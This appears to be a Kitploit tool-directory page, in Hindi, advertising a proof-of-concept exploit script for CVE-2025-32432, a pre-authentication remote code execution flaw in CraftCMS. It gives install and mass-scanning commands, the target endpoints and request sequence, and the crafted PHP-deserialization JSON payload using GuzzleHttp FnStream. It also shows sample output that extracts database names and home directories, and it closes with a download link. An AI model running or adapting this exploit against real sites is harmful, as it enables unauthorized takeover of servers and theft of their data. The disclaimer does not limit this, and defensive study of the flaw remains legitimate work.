Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32432 — इस रिपॉजिटरी में CVE-2025-32432 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट स्क्रिप्ट शामिल है, जो CraftCMS के 4.x और 5.x संस्करणों को प्रभावित करने वाली एक प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन (RCE) भेद्यता है। यह भेद्यता CraftCMS की एसेट ट्रांसफॉर्म जनरेशन सुविधा में मौजूद है। | Kitploit
उपकरण/GitHubGitHub/sachinart/cve-2025-32432
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubsachinart/cve-2025-32432

CVE-2025-32432

इस रिपॉजिटरी में CVE-2025-32432 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट स्क्रिप्ट शामिल है, जो CraftCMS के 4.x और 5.x संस्करणों को प्रभावित करने वाली एक प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन (RCE) भेद्यता है। यह भेद्यता CraftCMS की एसेट ट्रांसफॉर्म जनरेशन सुविधा में मौजूद है।

रिपॉजिटरी देखें
27431 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CraftCMS CVE-2025-32432 Chirag Artani द्वारा शोषण

अवलोकन

यह रिपॉजिटरी CVE-2025-32432 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट स्क्रिप्ट है, जो CraftCMS के संस्करण 4.x और 5.x को प्रभावित करने वाली एक प्री-ऑथेंटिकेशन रिमोट कोड एक्सेक्यूशन (RCE) कमजोरी है। यह कमजोरी CraftCMS की एसेट ट्रांसफॉर्म जनरेशन सुविधा में मौजूद है।

यह एक्सप्लॉइट स्क्रिप्ट निम्नलिखित तरीकों से कमजोरी का पता लगाने और सत्यापन को स्वचालित करती है:

  1. CraftCMS एडमिन डैशबोर्ड से CSRF टोकन निकालना
  2. PHP ऑब्जेक्ट इंजेक्शन के माध्यम से कमजोरी का शोषण करना
  3. सिस्टम जानकारी निकालकर सफल शोषण की पुष्टि करना

अस्वीकरण

⚠️ यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

इस उपकरण का उपयोग केवल उन प्रणालियों के खिलाफ करें जिनका परीक्षण करने की आपको स्पष्ट अनुमति है। अनुमति के बिना प्रणालियों के खिलाफ अनधिकृत परीक्षण अवैध और अनैतिक है।

विशेषताएँ

  • एकल लक्ष्य और एकाधिक लक्ष्य (फ़ाइल-आधारित) स्कैनिंग दोनों के लिए समर्थन
  • एकाधिक लक्ष्यों की तेज़ स्कैनिंग के लिए मल्टी-थ्रेडिंग क्षमता
  • डेटाबेस नाम और होम डायरेक्टरी जानकारी सहित विस्तृत आउटपुट
  • कमजोर लक्ष्यों के लिए CSV रिपोर्ट जनरेशन
  • स्व-हस्ताक्षरित प्रमाणपत्रों के साथ परीक्षण के लिए SSL सत्यापन को बायपास करना
  • मजबूत त्रुटि प्रबंधन

स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/Sachinart/CVE-2025-32432.git
cd CVE-2025-32432

# Install required dependencies
pip install -r requirements.txt

आवश्यकताएँ

  • Python 3.6+
  • आवश्यक Python पैकेज (requirements.txt देखें):
    • requests
    • beautifulsoup4
    • urllib3

उपयोग

एकल लक्ष्य

एकल लक्ष्य स्कैन करने के लिए:

root@kitploit:~
python3 craftcms_rce.py -u example.com

एकाधिक लक्ष्य

एक फ़ाइल से एकाधिक लक्ष्यों को स्कैन करने के लिए (प्रति पंक्ति एक URL):

root@kitploit:~
python3 craftcms_rce.py -f urls.txt -t 10

जहाँ -t उपयोग करने के लिए थ्रेड्स की संख्या निर्दिष्ट करता है (डिफ़ॉल्ट 5 है)।

विकल्प

root@kitploit:~
-u, --url     परीक्षण करने के लिए एकल URL
-f, --file    परीक्षण करने के लिए URL वाली फ़ाइल (प्रति पंक्ति एक)
-t, --threads थ्रेड्स की संख्या (डिफ़ॉल्ट: 5)
-h, --help    सहायता संदेश दिखाएं और बाहर निकलें

आउटपुट

स्क्रिप्ट परिणामों को कंसोल पर आउटपुट करेगी और कमजोर लक्ष्यों को vulnerable.txt में CSV प्रारूप में सहेजेगी जिसमें निम्नलिखित कॉलम होंगे:

  • URL
  • CRAFT_DB_DATABASE मान (डेटाबेस नाम)
  • HOME डायरेक्टरी पथ
  • अन्य सिस्टम जानकारी

कंसोल आउटपुट का उदाहरण:

root@kitploit:~
[*] Testing single target: https://example.com
[*] Starting scan with 5 threads
[+] VULNERABLE: https://example.com
    CRAFT_DB_DATABASE: example_db
    HOME Directory: /home/example

=== SCAN SUMMARY ===
Total URLs scanned: 1
Vulnerable sites: 1
Detailed results saved to vulnerable.txt

कमजोरी कैसे काम करती है

यह कमजोरी CraftCMS में एक डिसिरियलाइजेशन समस्या का शोषण करती है। शोषण:

  1. CSRF टोकन प्राप्त करने के लिए /index.php?p=admin/dashboard पर GET अनुरोध करता है
  2. एक विशेष रूप से तैयार JSON पेलोड के साथ /index.php?p=admin/actions/assets/generate-transform पर POST अनुरोध भेजता है
  3. पेलोड में एक PHP ऑब्जेक्ट शामिल होता है जो डिसिरियलाइज़ हो जाता है, जो GuzzleHttp\Psr7\FnStream क्लास के माध्यम से मनमाना कोड निष्पादन की ओर ले जाता है
  4. सफल शोषण की पुष्टि phpinfo() को निष्पादित करके और विशिष्ट सिस्टम जानकारी निकालकर की जाती है

तकनीकी विवरण

शोषण एसेट ट्रांसफॉर्म जनरेशन प्रक्रिया में एक असुरक्षित डिसिरियलाइजेशन का लाभ उठाता है। कमजोर कोड पथ हमलावर को एक कस्टम PHP ऑब्जेक्ट इंजेक्ट करने की अनुमति देता है जो अनसिरियलाइज़ हो जाता है, जिससे मनमाना कोड निष्पादन होता है।

पेलोड के प्रमुख घटक:

root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}

योगदान

योगदान, समस्याएं और सुविधा अनुरोधों का स्वागत है! issues पृष्ठ देखने के लिए स्वतंत्र महसूस करें।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

संदर्भ

  • CVE-2025-32432 विवरण
  • CraftCMS सुरक्षा सलाह

लेखक

  • Nicolas Bourras (Orange Cyberdefense) - मूल कमजोरी की खोज
  • Chirag Artani - एक्सप्लॉइट स्क्रिप्ट लेखक
टूल डाउनलोड करें